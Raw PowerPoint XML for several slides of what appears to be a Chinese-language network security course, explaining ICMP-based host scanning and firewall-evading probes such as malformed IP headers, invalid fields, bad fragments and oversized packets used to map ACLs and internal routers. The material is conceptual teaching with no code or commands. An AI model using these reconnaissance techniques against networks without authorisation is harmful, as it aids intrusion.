            <a:fld id="{D918763A-3B10-40C1-BFC3-0496AE66DF55}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3717451440"/>
      </p:ext>
    </p:extLst>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>问询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型包探测，如：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stamp Request(Type 13)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reply(Type 14)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Information Request(Type 15)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reply(Type 16)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Address Mask Request (Type 17)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Reply(Type 18)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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7AF1FF59-BE09-4724-9778-2B0CDDFE572B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311298" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Non-Echo ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描</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32" y="1303621"/>
            <a:ext cx="5081260" cy="4881376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354345902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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防火墙和网络过滤设备常导致传统的探测手段变得无效。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如简单拦截、过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议提供网络间传送错误信息的手段：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包头</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头中设置无效的字段值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误的数据分片</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过超长包探测内部路由器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反向映射探测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用防火墙等的方向性，易出难进</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传统扫描，由外向内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高级扫描，由内向外</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机扫描技术－高级技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C12B9371-9D74-4079-B7F8-07D375E8763E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2901336584"/>
      </p:ext>
    </p:extLst>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传统技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Echo-Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，其他类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>容易被防火墙、其他过滤设备拦截</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>高级技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用防火墙方向性，易出难进</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>构造有问题的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接收方用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议向发送方传送错误信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机扫描</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462716084"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向目标主机发送包头错误的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见的伪造错误字段为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Header Length Field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP Options Field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标主机或过滤设备会反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP Parameter Problem Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC1122</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规定：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机应该检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Version Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Checksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器应该检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Checksum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字段。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同厂家的路由器和操作系统对这些错误的处理方式不同，返回的结果也各异。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果结合其它手段，可以初步判断目标系统所在网络过滤设备的访问列表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包头</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C5BD174F-D79D-4ED5-A03C-B57E68FA14A2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3788724835"/>
      </p:ext>
    </p:extLst>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>向目标主机发送填充错误字段值的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标主机或过滤设备会反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Destination Unreachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种方法同样可以探测目标主机和网络设备以及其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>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C06B70D2-A6F7-4FCF-8F6E-E982F5ADB488}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317442" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头中设置无效的字段值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3556461268"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目标主机接收错误数据分片，如某些分片丢失，且在规定时间内得不到更正</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>丢弃数据包，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>并反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ICMP Fragment Reassembly Time Exceeded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>错误报文。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以检测到目标主机和网络过滤设备及其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>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DDC8BB0E-6C4E-4333-B75D-D7AD83FEC668}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319490" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>错误数据分片</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4460490"/>
            <a:ext cx="5733333" cy="1933333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2448681051"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包长度超过目标系统所在路由器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MTU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>且设置禁止分片标志</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>路由器反馈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Fragmentation Needed and Don’t Fragment Bit was Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>差错报文</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取目标系统的网络拓扑结构。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321538" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过超长包探测内部路由器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C849EC80-D566-4FEB-954B-E4D6ACF173F7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2886520618"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
